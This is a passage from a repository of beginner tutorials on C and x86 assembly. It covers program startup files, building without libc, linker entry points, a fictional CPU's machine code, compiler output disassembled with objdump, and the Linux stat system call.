standard C program, does quite a lot of things before the `main` function gets actually executed. And know what...we can actually make our C program look a lot more like the ASM version. 181 | 182 | What happens is that the linker (do you remember that guy) is adding a default version of `_start` that, at the very end calls our `main` function. This code is contained in a file called `crt1.o`... and sure, we can get rid of it. 183 | 184 | Let's rename our `main` function to `_start`. Our program will look like this: 185 | 186 | ```C 187 | #include 188 | 189 | void _start (void) 190 | { 191 | register int a = 10; 192 | register int b = 20; 193 | 194 | a +=b; 195 | _exit (a); 196 | } 197 | ``` 198 | 199 | Now we have to tell the compiler that we do not want to use `crt1.o`. The compiler knows this file (and some other ones used for application start up) as a _start file_: 200 | 201 | 202 | $ gcc -nostartfiles -o c2-2 c2-2.c 203 | $ ./c2-2; echo $? 204 | 30 205 | 206 | 207 | Good. Our program still works the same. We have made it start at `_start` instead of at `main` and, now, it looks a lot closer to our original ASM code. Actually we have achieve a big improvement. Let's produce a static version of our original C code using the start files, and our last version without using them. 208 | 209 | $ gcc -static -o c2-1s c2-1.c 210 | $ gcc -static -nostartfiles -o c2-2s c2-2.c 211 | $ ls -l c2-?s | awk '{print $9, $5;}' 212 | c2-0s 737 213 | c2-1s 872956 214 | c2-2s 5420 215 | 216 | Wow... that is a big difference in size!... We are still far away of the size of our first assembly version, but that is not bad. Try to do an `objdump` on the two files produced from C source code to see what's the difference. 217 | 218 | # The Last Step 219 | There is one last thing we can do, to get even closer to our original ASM code. We can get rid of the C library! 220 | 221 | If you had paid attention, I said before that we need the standard C library to invoke a system call in a portable way. But what if we do not care about portability?... Yes, we already know how to invoke the `exit` system call from ASM... So, why we do not get rid of the C library and we provide our own implementation for the `_exit` function?. Let's try: 222 | 223 | So, let's create a new file named `exit.s` and let's declare the `_exit` symbol in there together with our ASM code to call the `exit` syscall: 224 | 225 | ```nasm 226 | .global _exit 227 | _exit: 228 | mov $0x3c, %eax 229 | syscall 230 | ``` 231 | 232 | This should be pretty basic. You may be missing something... don't you?. Sure. Where is our parameter? Well, it is actually there just because of the standard C **ABI** (_Application Binary Interface_). The ABI defines, among other things, how parameters are passed to functions. We will be discovering it as we go on through this course. For know, it is enough to know that the first parameter we pass to a C function is stored in the `rdi` register (supposing it fits there). 233 | 234 | Note that this is for x86 64bits processors. 32 bits and other processor follow different ABIs and the parameters are passed in different ways. This is one of the reasons why it is a bad idea to do what we are doing if we are planing to re-compile our programs for different platforms... This is one of the reasons why the standard C library is there... To make our C code portable. 235 | 236 | Let's try to recompile our program. We do not have to change anything on the code. We are just going to use our new `_exit` function and tell the compiler to forget about the standard C library (`libc`) version of `_exit`. 237 | 238 | $ gcc -static -nostartfiles -nostdlib -o c2-0s c2-2.c exit.s 239 | $ ls -l c2-?s | awk '{print $9, $5;}' 240 | c2-0s 737 241 | c2-1s 872956 242 | c2-2s 5420 243 | c2-3s 1341 244 | 245 | The first thing to note is that the `-nostdlib` flag is the one that let us remove the standard C library. The second is that we can pass assembly source files directly to `gcc`!!!. The third one is that our program that was close to 1MB when we started is now slightly above 1KB!. We have got pretty close to the size of our original assembly version! 246 | 247 | Actually, if we strip the binaries, the difference of removing the standard C library is not that relevant, but our C version size still doubles the original assembly one: 248 | 249 | $ sstrip -z c2-0s 250 | $ sstrip -z c2-1s 251 | $ sstrip -z c2-2s 252 | $ sstrip -z c2-3s 253 | $ ls -l c2-?s | awk '{print $9, $5;}' 254 | c2-0s 148 255 | c2-1s 789552 256 | c2-2s 589 257 | c2-3s 369 258 | 259 | # A Word on the Linker 260 | Before finishing this paper, let me share with you a couple of words about the linker. You may be wondering (I did some time ago) who decides that `_start` is the first function to run, or why my `.text` segment goes to address `0x400000` (again on a 64 bits computer). OK, the answer to all these questions is: **THE LINKER**. 261 | 262 | You can modify those values using linker flags. For instance, let's change our entry point to `_start1` and put our `.text` segment at `0x500000` instead of `0x400000` 263 | 264 | $ gcc -static -nostdlib -nostartfiles -o kk c2-3.c exit.s -Wl,-e_start1 -Ttext=0x500000 265 | $ readelf -hs kk 266 | ELF Header: 267 | Magic: 7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00 268 | Class: ELF64 269 | Data: 2's complement, little endian 270 | Version: 1 (current) 271 | OS/ABI: UNIX - System V 272 | ABI Version: 0 273 | Type: EXEC (Executable file) 274 | Machine: Advanced Micro Devices X86-64 275 | Version: 0x1 276 | Entry point address: 0x500000 277 | Start of program headers: 64 (bytes into file) 278 | Start of section headers: 1048800 (bytes into file) 279 | Flags: 0x0 280 | Size of this header: 64 (bytes) 281 | Size of program headers: 56 (bytes) 282 | Number of program headers: 3 283 | Size of section headers: 64 (bytes) 284 | Number of section headers: 8 285 | Section header string table index: 5 286 | 287 | Symbol table '.symtab' contains 12 entries: 288 | Num: Value Size Type Bind Vis Ndx Name 289 | 0: 0000000000000000 0 NOTYPE LOCAL DEFAULT UND 290 | 1: 0000000000500000 0 SECTION LOCAL DEFAULT 1 291 | 2: 00000000004000e8 0 SECTION LOCAL DEFAULT 2 292 | 3: 0000000000500030 0 SECTION LOCAL DEFAULT 3 293 | 4: 0000000000000000 0 SECTION LOCAL DEFAULT 4 294 | 5: 0000000000000000 0 FILE LOCAL DEFAULT ABS c2-3.c 295 | 6: 0000000000000000 0 FILE LOCAL DEFAULT ABS 296 | 7: 0000000000701000 0 NOTYPE GLOBAL DEFAULT 3 __bss_start 297 | 8: 0000000000500000 38 FUNC GLOBAL DEFAULT 1 _start1 298 | 9: 0000000000701000 0 NOTYPE GLOBAL DEFAULT 3 _edata 299 | 10: 0000000000701000 0 NOTYPE GLOBAL DEFAULT 3 _end 300 | 11: 0000000000500026 0 NOTYPE GLOBAL DEFAULT 1 _exit 301 | 302 | As you can see, the `_start1` function is located at `0x500000` that is actually our entry point (check the ELF header just above). 303 | 304 | As you may have already figured out, the `-Wl,XXX` is the way to feed options to the linker from the compiler. Alternatively you can create `.o` object files and then link manually, passing the options to the linker normally. The same way we did with our first ASM program. 305 | 306 | You may be wondering now. That's fine... more command-line options. But usually I do not set those command-line options when I compile my programs. Where does all those values comes from? 307 | 308 | Again a very legit question. I will not completely answer it, but I will give you some hints to get some fun yourself in case you are interested on this stuff. 309 | 310 | The first hint is **'linker script'**. It is very likely that you will never see one of those, even if you become a professional programmer. And it is even more likely that you will ever have to write one of those. However, if you go into the world of embedded systems... well, you will surely have to deal with them. 311 | 312 | The second one is: 313 | 314 | $ gcc -o c2-1 c2-1.c -Wl,-verbose 315 | 316 | 317 | # CONCLUSIONS 318 | In this part we have learn how to convert an ASM source file into a executable program for the Linux OS. We have also got a basic idea on how to use system calls and also how the program start up process in a C program relates to a similar program written in ASM code. 319 | 320 | Finally, we have learn about the main parts of a C program which are automatically and silently added to our code whenever we compile it. We have also seen how the standard library provides a portable and uniform interface for our C programs and how it does hides the platform-specific details to interface with the Operating System. In a sense we have also experienced how this Standard library, stacks on top of the OS, that stacks on top of the _Bare Metal_. 321 | 322 | In this trip, we have seen how to strip down a C program to reduce it to its minimal expression... really close to what we can achieve writing our code directly in ASM... and how we lost, in the process, the portability of our code. 323 | 324 | 325 | * PREVIOUS: [Programming for Wannabes. Part I. Your first Program](part-01.md) 326 | * NEXT: [Programming for Wannabes. Part II and a half. Systemcalls (ARM and MIPS)](part-02.5.md) 327 | -------------------------------------------------------------------------------- /part-01.md: -------------------------------------------------------------------------------- 1 | # Programming for Wannabes. Part I. Your first Program 2 | 3 | If you are reading this is because you want to be a hacker. Therefore, you are automatically a [wannabe](http://www.catb.org/jargon/html/W/wannabee.html). It does not sound that cool, but it is actually pretty cool. It means that you still have a lot of exciting things to discover!!! 4 | 5 | First things first. This is going to be a joint course on C and assembly programming. Those are the only two languages a real hacker has to know. Yes. Really. The only two languages that will let you do the real hacking. You can do some stuff with Python or PowerShell... but that is Skid stuff.. You know what the S on skid stands for... don't you?. It stands for Script :stuck_out_tongue_winking_eye: 6 | 7 | Easy, this was just a joke to catch your attention. Now seriously. Learning scripting languages is a powerful tool and will save you a lot of time in many cases. Mastering Python is indeed a great skill and it is something you should invest time on. Analogously, C and assembly are the only way forward for some topics: reverse engineering, kernel level rootkits, and some system level programming can only be done with those low level languages. So, if you really want to be a hacker... man, there is no way around, you gotta have to learn CASM (C + ASM :). 8 | 9 | Two notes before we start: 10 | 11 | - I'm not a hacker myself. Not even a wannabe. Really I do not have any interest on becoming a hacker. This basically means that you should take this course as a starting point. When you get done with it... then... your journey will really start. 12 | - No. HTML is not a programming language. If you think that... you really need to go through this course. :stuck_out_tongue_closed_eyes: 13 | 14 | The course will be organized as follows: 15 | 16 | - Some introduction to what a computer is. These are low level languages and you need to get to know low level stuff 17 | - That is it for now :P 18 | 19 | # How have you end up here? 20 | That is a good question. In all honestly there are zillions of C/ASM programming tutorials and courses out there. I know, they look useless. They are not what you are looking for. That's fine... and that is why you are reading this right now. 21 | 22 | To understand why all those tutorials haven't help you, we need to learn a little bit about the different layers beneath the tools we want to build... Yes, layers. There are lots of them. 23 | 24 | So, let's start this trip bottom-up. At the very low level you have what is usually know as the _Bare Metal_. That is roughly the computer processor and the memory. We may consider the BIOS to be also at this level and some other elements usually grouped under the generic name of chipset. 25 | 26 | On top of the _Bare Metal_ we find the _Operating System_. The operating system is in charge of managing the HW. There is a lot to do there and each hardware device has its own peculiarities (that's why we have all those drivers). The operating system gives us standard services to access the disk, the memory, the USB devices... You can indeed do all this at the _Bare Metal_ layer but... then you will end up writing an operating system... 27 | 28 | The next layer we found is the _System Libraries_ layer. These are normal fragments of code that are used for many different programs. We group those pieces of code in a file and we call it a library. Then we can use that code from our programs. There are literally, thousands of libraries available for any OS out there. 29 | 30 | The top level of this stack of layers are the _Programs_ (this also includes Application Level Libraries). These are the things you want to write yourselves when you decide to learn how to program a computer. You write these programs in some programming language. C and ASM are two of those programming languages... There are hundreds of them, and you should learn quite some and choose the right one for the task you want to accomplish. 31 | 32 | # Going Top Down 33 | OK, fair enough. Now that we are at the top level, let's look down for a while. You have learn a specific language. 34 | 35 | Let's say you have learn C using one of those on-line tutorials. The original C language has 32 keywords. The syntax is pretty simple and easy to learn. Yes, really, is a pretty simple language. However, knowing the C keywords and syntax does not let you do much. 36 | 37 | You need to learn something more. At least, one thing called the _Standard C library_. Without this, you cannot even print anything on the screen, read any used input or deal with files. And this happens with nearly all programming languages out there. You need a minimal library to be able to interact with your operating system and then, let your operating system deal with the _Bare Metal_. 38 | 39 | Therefore, learning the syntax of a language, and the basics of its standard libraries only brings you half way (in the best case) to where you were aiming to be. 40 | 41 | Learning C and ASM to become a hacker requires you to learn not just the language keywords, syntax, idioms, (put whatever nowadays buzzword in here)... You also need to learn how to use the system libraries, how does your operating system works and also how does your computer works. 42 | 43 | That is why there is a huge difference between a C programming course that teaches you how to code C and a hacking programming course that teaches you how to do stuff. Usually, after you have learnt the syntax, you have to go into specific courses tutorials: Network Programming, Kernel Programming, 3D graphics programming, GUI programming,... Each one of those has their own peculiarities and requires quite some time to manage them. In a sense we will be covering here what is generally known as _System Programming_. This cover quite some of the topics usually related to hacking. 44 | 45 | Hope that at this point you have understood, that hacking/system programming is not about learning a programming language. That is the simplest part. You have to learn a lot of other things... summing up. You have to learn what is going on every time you type a line of code. 46 | 47 | So, it is time to learn the basics about a computer. C and ASM are low level programming languages. We will see soon how true this is. This means, that, to really master those programming languages you need to know, at least, the basics of how does a computer works. 48 | 49 | # The Simplest Computer in The World 50 | Despite of how people things technology has advance in the last decades, the reality is that computers haven't change much in nearly 50 years. They are faster, they are smaller, they consume less power... but they still work the same way. Indeed, this is a simplification, but at the level at which we are going to work this is actually the case. 51 | 52 | For illustration purposes, let's introduce the SCTW-2000. This is a fictional computer that will let us introduce different concepts in a generic way. It could easily be one of the popular home microcomputers from the 80s. We will match the SCTW-2000 with real examples, but we will avoid using real computers, at least at the beginning and for the sake of simplicity. 53 | 54 | The SCTW-2000, as many other computers out there is basically composed of two main parts: CPU and memory 55 | 56 | Let's dive into each of these elements to get the big picture. 57 | 58 | # The Memory 59 | There are a lot of different types of memories: RAM, ROM, SRAM, DRAM, SDRAM, PROM, FLASH, Serial FLASH, ... From a SW point of view, unless we go really low level (something we are not going to do in this course), we do not care about the type of memory our computer have. That is important for the HW guys but not for us. At least not now. What is important for us is how does this element fit within the overall computer architecture. 60 | 61 | For the time being, let's imagine the computer's memory as a huge bunch of drawers, one on top of the other. Inside each drawer we can store one number. An 8 bits number, or in other words, a number between 0 and 255 (that is 2^8 values... 8 bits). Finally, let's number the drawers, starting for the one on the bottom (number 0), and giving consecutive numbers to the drawers on top. Something like this 62 | 63 | +--------+ 64 | + 8 bits | Drawer 3 65 | +--------+ 66 | | 8 bits | Drawer 2 67 | +--------+ 68 | | 8 bits | Drawer 1 69 | +--------+ 70 | | 8 bits | Drawer 0 71 | +--------+ 72 | 73 | The higher the memory in our computer, the taller the drawer pile will be. For instance, if our computer have 64KB of RAM... yes it sounds ridiculous nowadays, it is just an example. So a computer with 64 KB of memory will have 65536 drawers one on top of the other. 74 | 75 | Each drawer is known as a memory address, and the number inside the drawer is the content of that memory address. 76 | 77 | This is it about the memory for now. Let's look to the CPU 78 | 79 | # The CPU 80 | The CPU is the other main component of the computer. It is composed of the following parts: 81 | 82 | * A set of registers 83 | * A Arithmetic-Logic Unit (ALU) 84 | * Some control logic. 85 | 86 | 87 | ## Registers 88 | Let's start with the registers. You can see the CPU registers as a small piece of memory that is inside the CPU and therefore it is super fast, and can hold numbers bigger than the 8 bits stored in each of our fictional memory addresses. On the other hand, this is a very small memory, something in the range of 4 to 32 positions (drawers). Compare to the 65536 drawers for our ridiculous small 64KB memory.... Each of this positions are known as a register. Registers can be numbered starting from 0 like the memory or they can be named. 89 | 90 | For instance the Z-80 processor, named their registers as: `AF, BC, DE, HL, IX, IY`. The Intel processors traditionally named their registers as: `AX, BX, CX, DX, SI, DI`,... Motorola processor used more systematic naming schema for their registers: `A0-A7` (_address registers_) `D0-D7` (_data registers_) for its 68K. 91 | 92 | As the number of available registers grows, it is usual to follow the Motorola schema and name the registers with a consecutive number. This way, X86-64 (64 bits intel/amd processors) name their registers (the general purpose ones) `r0-r15` (lower register have names compatible with the i386 processor). Same with MIPS and ARM processor. 93 | 94 | Any way. Most of the processors used to build computers have a set of registers. A very fast and very small memory area inside the processor itself. 95 | 96 | ## The ALU 97 | The second element of the processor is the Arithmetic-Logic Unit. And yes, it basically performs arithmetic and logic operations. You can add, substract, multiply, and, or, xor values using this processor element... and that is what a computer actually does most of the time. 98 | 99 | The ALU performs this operations either using the values stored in the registers or values taken from the memory, and stores the results, again, either in a register or a memory address. The available options actually depends on the processor. Old processor only could perform operation on registers and some only on certain registers. Nowadays, this is no longer the case. 100 | 101 | This is really it for the ALU 102 | 103 | ## The Control Unit 104 | The last part of the processor we are interested on is the Cotrol Unit. In all honesty, in this simplified computer model, the control unit is anything else inside the processor except the registers and the ALU (branch prediction unit, cache management, bus signaling, pipeline management, memory management unit...). We won't go in details about most of those circuitries in this course, however, there are a couple of basic functions that we have to be aware of. 105 | 106 | One of these things is controlling the CPU external interface. In other words, the state of all those little pins that go out of the CPU chip. Using these pins, the processor can talk to the memory to read and write values in those drawers and can also interface to different types of hardware... 107 | 108 | So, when the ALU needs some data from the memory to perform some operation, it asks the control unit to activate the right pins on the processor to command the memory chip to read or write a given memory position. The memory chip will get the value to write from some CPU pines or put the value to read in some other pins (or multiplex these two pin sets, that is using the same pins for reading/writing and even addressing the memory). OK, it does not really work like this, but otherwise we will have a very, very long introductory chapter ;) 109 | 110 | The control unit is also in charge of reading the program from memory, parsing it and executing the machine code.... 111 | 112 | # Machine Code 113 | We will not talk much about machine code... we will be talking about ASM, but, you at least need to know what this machine code is. For that, we need to understand how the CPU runs a program and how does a program looks like. 114 | 115 | The first thing we have to introduce is the __Program Counter__ (`PC`) or __Instruction Pointer__ (`IP`). The name depends on the processor family you are working with. This is a special register in the CPU that indicates which memory address in the main memory contains the next instruction to run. Whenever the processor executes an instruction, the `IP` is increased by one (actually it may be more than one, if the current instruction takes several bytes... more on this in a sec), unless the instruction is a branch/jump. In that case, a new value is assigned to the `IP` so the next instruction will be taken from a new position. 116 | 117 | But, you may be wondering... what are those instructions?. OK, no panic. Let's go back for a second to our fictional SCTW-2000. Now that we know a lot about processors, I can tell you about the specs for the awesome SCTW-2000: 118 | 119 | - It has 2 registers named `EBX` and `EBP` (you will see later why we have chosen these names), plus an instruction pointer named `RIP` 120 | - The ALU can perform the following operation: `ADD` two registers 121 | - It has an instruction `MOV` to assign values to registers. 122 | - After reset (or on power on) all registers are set to 0 (including `RIP`) 123 | 124 | Now, to fully specify the SCTW-2000 we have to define the instruction it can run. The numbers the control unit will be able to understand... that is _the machine code_. For the SCTW-2000 it is something like this: 125 | 126 | OPCODE | MNEMONIC | Description 127 | -----------+-------------+----------------------------------------------- 128 | 0xbb XX | MOV EBX, XX | Copies the value XX in register R0 129 | 0xbd XX | MOV EBP, XX | Copies the value XX in register R0 130 | 0x01 XX YY | ADD XX, YY | Adds the values of register XX and register YY 131 | | | ands stores the result on register XX 132 | 0x90 | NOP | No Operation. Does nothing 133 | 0x00 | HALT | Stops the processor 134 | 135 | As you can see we have used three columns for this table. The first column contains only numbers (1, 2 or 3 numbers depending on the instruction). Yes, instruction may take, and actually take more than one single memory address. This is the __machine code__, the sequence of numbers stored in memory that the CPU can understand. We have chose some arbitrary opcodes (not so arbitrary but for the time being, it does not really matter which OPCODES we've chosen). 136 | 137 | Remembering those number is hard for humans. Sure, we can manage for the SCTW-2000, but a real processor may easily have hundreds of those OPCODEs. For that reason, we use something a bit easier to remember for us (that's why this is named [mnemonics](https://en.wikipedia.org/wiki/Mnemonic_(disambiguation)) - from the greek "_memory related_", yes a bit of a free translation)... That is actually the assembly language that you are trying to learn. The ASM language has to be converted into machine code... that is the task of the program know as __assembler__. 138 | 139 | # Our first program 140 | To illustrate all this, let's write a simple program that adds two numbers: `10` and `20`. The assembly code for the SCTW-2000 and for such a stupid program will be: 141 | 142 | ```nasm 143 | MOV EBX, 10 144 | MOV EBP, 20 145 | ADD EBX, EBP 146 | HALT 147 | ``` 148 | 149 | Now let's do the work of the assembler by hand using the opcode/mnemonic table above: 150 | 151 | ```nasm 152 | ASM MACHINE CODE 153 | MOV EBX, 10 -> 0xbb 0x0a 154 | MOV EBP, 20 -> 0xbd 0x14 155 | ADD EBX, EBP -> 0x01 0x00 0x01 156 | HALT -> 0xff 157 | ``` 158 | Now we can put the program in our memory: 159 | 160 | ADDR-07 | 0xff | 161 | ADDR-06 | 0x01 | 162 | ADDR-05 | 0x00 | 163 | ADDR-04 | 0x01 | 164 | ADDR-03 | 0x14 | 165 | ADDR-02 | 0xbd | 166 | ADDR-01 | 0x0a | 167 | ADDR-00 | 0xbb | <= RIP 168 | 169 | Our program requires 8 bytes of memory. We copy the program starting at position 0, and after resetting the SCTW-2000 (sure, we are using SDRAM for the SCTW-2000), the `RIP` will point to address 0 and will start reading the machine code and executing the instructions. 170 | 171 | > Not all processor starts execution at address 0. You have to check the datasheet for the processor to figure out the boot process and conditions 172 | 173 | # C as a Low-Level Programing Language 174 | Before finishing this first part, we have to quickly introduce the other language we are going to work with in this course and we also have to justify why we shall consider C a low level programming language. 175 | 176 | For doing that, we are going to try to produce exactly the same code we have generated by hand in the previous section, using a C program. Instead of the SCTW-2000, we are going to use an Intel 64bits... You will see how similar these two processors are :) 177 | 178 | Let's write this program in a text file. Call it `ph1.c` 179 | 180 | ```C 181 | int f1 (void) 182 | { 183 | register int a = 10; 184 | register int b = 20; 185 | 186 | a += b; 187 | return a; 188 | } 189 | int main (void) 190 | { 191 | int a; 192 | a = f1(); 193 | } 194 | ``` 195 | 196 | The program looks a bit weird. The reason is that we are not working at the bare metal level. We have an operating system and a file format to honour, so the compiler has to create quite some more stuff than just the machine code for our code. Moreover, we have to use everything we put in the code, otherwise, the compiler will realise that, and remove the code detected as dead (the one that will never be used)... which is bad for our didactic purposes. 197 | 198 | We will progressively go into all those details. Right now, it is not really needed to completely understand what is going on. You just need to realize a couple of things. 199 | 200 | First, concentrate on the function `f1`, at the beginning of the program. No need to fully understand the syntax, just pay attention to the following: 201 | 202 | * The `register` keyword in C, tell the compiler that we want to use a register. By default it will try to use memory for variables (actually the stack, but we haven't talked about it yet), but, as you can see we can force the compiler to produce machine code that uses the registers... as we did with our assembler version. 203 | * Then you can see the equivalent to our assembler program. We store 10 in one variable (that will be hold in a register), 20 in another, and then we add both number and store it in the first variable. This is roughly the ASM code we wrote before!!!! 204 | 205 | Let's compile the program and take a look to the machine code: 206 | 207 | `$ gcc -fomit-frame-pointer -o ph1 ph1.c` 208 | 209 | The `-fomit-frame-pointer` is just to remove some code generated by the compiler that is not relevant right now. And what we've got out of this compilation is: 210 | 211 | $ objdump -M intel -d ph1 | grep -A 20 '' 212 | 00000000004004b4 : 213 | 4004b4: 55 push rbp 214 | 4004b5: 53 push rbx 215 | 4004b6: bb 0a 00 00 00 mov ebx,0xa 216 | 4004bb: bd 14 00 00 00 mov ebp,0x14 217 | 4004c0: 01 eb add ebx,ebp 218 | 4004c2: 89 d8 mov eax,ebx 219 | 4004c4: 5b pop rbx 220 | 4004c5: 5d pop rbp 221 | 4004c6: c3 ret 222 | 223 | I had kindly asked `objdump` to produce intel assembly because it's closer to the one we used for our awesome SCTW-2000 (that is the `-M intel` flag). 224 | 225 | Let's look at `0x4004b6` to `0x4004c0`: 226 | 227 | 4004b6: bb 0a 00 00 00 mov ebx,0xa 228 | 4004bb: bd 14 00 00 00 mov ebp,0x14 229 | 4004c0: 01 eb add ebx,ebp 230 | 231 | So, this looks pretty similar to the machine code, we generated for our fictional SCTW-2000 processor. The main differences: 232 | 233 | - gcc is generating 32 bits values for our constants. Even if we declare our variables as `char`, a 32 bits value will be generated... Later in the series we will learn why. 234 | - The `add` instruction is a bit different. Intel machine code encodes the registers in the opcode to save space, that is why the machine code for the `add ebx,ebp` is just `0x01 0xeb`, instead of our `0x01, 0x00, 0x01`. Check the intel manual for full details 235 | 236 | Well, we have managed to write some C code that almost exactly matches the machine code we want the computer to run... this is why C is considered a low level programming language :). 237 | 238 | # For the Lulz 239 | Just for fun. Let's see how the ASM for ARM will look like. 240 | 241 | First let's compile the program for ARM: 242 | 243 | `$ arm-linux-gnueabi-gcc -fomit-frame-pointer -o ph1-arm ph1.c` 244 | 245 | And now, let's look at the code: 246 | 247 | 248 | $ arm-linux-gnueabi-objdump -M intel -d ph1-arm | grep -A 20 '' 249 | Unrecognised disassembler option: intel 250 | 0000840c : 251 | 840c: e92d0030 push {r4, r5} 252 | 8410: e3a0400a mov r4, #10 253 | 8414: e3a05014 mov r5, #20 254 | 8418: e0844005 add r4, r4, r5 255 | 841c: e1a03004 mov r3, r4 256 | 8420: e1a00003 mov r0, r3 257 | 8424: e8bd0030 pop {r4, r5} 258 | 8428: e12fff1e bx lr 259 | 260 | OK, the OP codes are completely different, but the assembly is pretty accurate. You can see that, for ARM, the `add` instruction accepts 3 parameters instead of just 2. Other than that... it is pretty similar to our SCTW-2000 ASM and also to the Intel 64bits ASM. 261 | 262 | And for MIPS we get: 263 | 264 | $ mips-linux-gcc -fomit-frame-pointer -o ph1-mips ph1-1.c 265 | $ mips-linux-objdump -d ph1-mips | grep -A 20 '' 266 | 00400720 : 267 | 400720: 2402000a li v0,10 268 | 400724: 24030014 li v1,20 269 | 400728: 00431021 addu v0,v0,v1 270 | 40072c: 03e00008 jr ra 271 | 400730: 00000000 nop 272 | 273 | This is a bit different but still... change `li` to `mov` and `addu` to add... and there you go. 274 | 275 | 276 | # Conclusions 277 | Well, this concludes the first part of this course. We have quickly seen the main components of a computer, and the relation between the machine code, the assembler and the C programming language. We have also seen that knowing the language syntax is just a small part of what you need to know to actually write useful code. Finally, we have checked why C is considered a low level programming language and we've also got a glimpse of how the language can be used to control what is actually executed by the processor. 278 | 279 | Please, let me know in the comments if you have found this useful, if it is comprehensive, if you are missing something, if you got bored to dead... and click the heart icon if you are interested in more installments for this series (I know some people read the posts but never comment on them)... I won't bother you guys in case you are not interested on this kind of stuff. 280 | 281 | # Appendix. Installing required tools 282 | In case you need help to get the tools we used in this tutorial, here are some pointers :slight_smile: 283 | 284 | For intel you can just install build-essential 285 | 286 | apt-get install build-essential 287 | 288 | This should install all the tools you need, including the compiler. For non debian based distros you need to look for the packages for `gcc` and the so-called `binutils`. 289 | 290 | Forar ARM things are also easy 291 | 292 | apt-get install gcc-arm-linux-gnueabihf 293 | apt-get install gcc-arm-linux-gnueabi 294 | 295 | The first one is for Hardware Floating-Point and should work for any recent ARM. Just go for that. You may also need to install the binutils package for ARM 296 | 297 | apt-get install binutils-arm-linux-gnueabi 298 | 299 | For MIPS you won't find a toolchain in your distro repository, so you have to get one from somewhere else or compile your own. Check this page to chose one. I cannot remember which one I used for this post. 300 | 301 | https://www.linux-mips.org/wiki/Toolchains 302 | 303 | Just uncompress the toolchain anywhere and set your `PATH` to the directory containing all the binaries... That's it 304 | 305 | 306 | * NEXT: [Programming for Wannabes. Part II. Systemcalls](part-02.md) 307 | -------------------------------------------------------------------------------- /part-08.md: -------------------------------------------------------------------------------- 1 | # Programming for Wanabes VIII. File Details 2 | We have learnt how to scan directories and list their content, now we need to figure out how to get the details of the directory contents so we can chose the files we are interested on. This is actually very simple and requires one single system call. 3 | 4 | # The `stat` system call 5 | 6 | The `stat` system call, allow us to get all the details of a specific fie. The prototype of this syscall is : 7 | 8 | ```C 9 | int stat(const char *pathname, struct stat *statbuf); 10 | ``` 11 | 12 | And the `struct stat` (now we know what a struct is don't we?), contains the following information: 13 | 14 | ```C 15 | struct stat { 16 | dev_t st_dev; /* ID of device containing file */ 17 | ino_t st_ino; /* Inode number */ 18 | mode_t st_mode; /* File type and mode */ 19 | nlink_t st_nlink; /* Number of hard links */ 20 | uid_t st_uid; /* User ID of owner */ 21 | gid_t st_gid; /* Group ID of owner */ 22 | dev_t st_rdev; /* Device ID (if special file) */ 23 | off_t st_size; /* Total size, in bytes */ 24 | blksize_t st_blksize; /* Block size for filesystem I/O */ 25 | blkcnt_t st_blocks; /* Number of 512B blocks allocated */ 26 | 27 | /* Since Linux 2.6, the kernel supports nanosecond 28 | precision for the following timestamp fields. 29 | For the details before Linux 2.6, see NOTES. */ 30 | 31 | struct timespec st_atim; /* Time of last access */ 32 | struct timespec st_mtim; /* Time of last modification */ 33 | struct timespec st_ctim; /* Time of last status change */ 34 | }; 35 | ``` 36 | 37 | The most interesting field for us is `st_mode`, but there is a lot of other useful information that we will be using in the future. The structure is describe in the `stat` man page for your future references. 38 | 39 | # Understanding the `st_mode` field 40 | 41 | The `st_mode` field encodes the type of file and also the permissions. The man page includes some sample code showing us how to access that information. So, the way to access the type of file is using the bit mask `S_IFMT`: 42 | 43 | ```C 44 | struct st sb; 45 | stat (a_file_name, &sb); 46 | int type = sb.st_mode & S_IFMT 47 | ``` 48 | 49 | The `&` operator is a bitwise AND.... It basically matches two binary numbers and only the bits that are the same remains. Let's see what is in `S_IFMT`. I can tell you directly, but I believe it is going to be good for you to learn how to get this information by yourself, so you can find whatever you want in the future. 50 | 51 | We will start looking in the header files indicated by the man page. At the top of the man page you will see the `includes` you need to add to your program to use the system call. 52 | 53 | 54 | NAME 55 | stat, fstat, lstat, fstatat - get file status 56 | 57 | SYNOPSIS 58 | #include 59 | #include 60 | #include 61 | 62 | 63 | The `sys/types.h` sounds pretty generic so I will skip it (you can actually look into it, but you won't find anything). So let's look into `sys/stat.h` that sounds more like the specifics for `stat`. 64 | 65 | $ grep "IFMT" /usr/include/sys/stat.h 66 | # define S_IFMT __S_IFMT 67 | #define __S_ISTYPE(mode, mask) (((mode) & __S_IFMT) == (mask)) 68 | 69 | Well, looks like the actual value is defined somewhere else, but we can see also a macro to quickly check against the different types. We can use it like: 70 | 71 | ```C 72 | __S_ISTYPE(sb.st_mode,S_IFREG) 73 | // is equivalent to 74 | (((sb.st_mode) & __S_IFMT) == (S_IFREG) 75 | ``` 76 | 77 | That second define is called a macro. They work the same than the normal defines (they are just substituted by its value in the code before compiling) but we can use parameters to write more complex expressions. When we use parameters, the `define` is said to define a macro instead of a constant. 78 | 79 | So, in order to find out the actual value of `S_IFMT`, we need to look into the includes, included by the include :). 80 | 81 | $ grep "#include" /usr/include/sys/stat.h 82 | #include 83 | #include /* For __mode_t and __dev_t. */ 84 | #include 85 | 86 | _NOTE:I'm using grep to show this information. It is, in general, very handy to do it this way, but I would recommend, at the beginning, to find these information manually, that is, opening the file in an editor and browse through it. The reason is that you will see how this system include files look like and get familiar with them. You will also find curious thing that will spark your curiosity._ 87 | 88 | Again, we can go through all of them systematically, but `bits/stat.h` looks like the best candidate. 89 | 90 | $ grep "IFMT" /usr/include/bits/stat.h 91 | #define __S_IFMT 0170000 /* These bits determine file type. */ 92 | 93 | We found it!. Actually if we open the file, we will also find, all the other relevant constants. These are the ones: 94 | 95 | ```C 96 | #define __S_IFMT 0170000 /* These bits determine file type. */ 97 | 98 | /* File types. */ 99 | #define __S_IFDIR 0040000 /* Directory. */ 100 | #define __S_IFCHR 0020000 /* Character device. */ 101 | #define __S_IFBLK 0060000 /* Block device. */ 102 | #define __S_IFREG 0100000 /* Regular file. */ 103 | #define __S_IFIFO 0010000 /* FIFO. */ 104 | #define __S_IFLNK 0120000 /* Symbolic link. */ 105 | #define __S_IFSOCK 0140000 /* Socket. */ 106 | 107 | /* Protection bits. */ 108 | 109 | #define __S_ISUID 04000 /* Set user ID on execution. */ 110 | #define __S_ISGID 02000 /* Set group ID on execution. */ 111 | #define __S_ISVTX 01000 /* Save swapped text after use (sticky). */ 112 | #define __S_IREAD 0400 /* Read by owner. */ 113 | #define __S_IWRITE 0200 /* Write by owner. */ 114 | #define __S_IEXEC 0100 /* Execute by owner. */ 115 | ``` 116 | 117 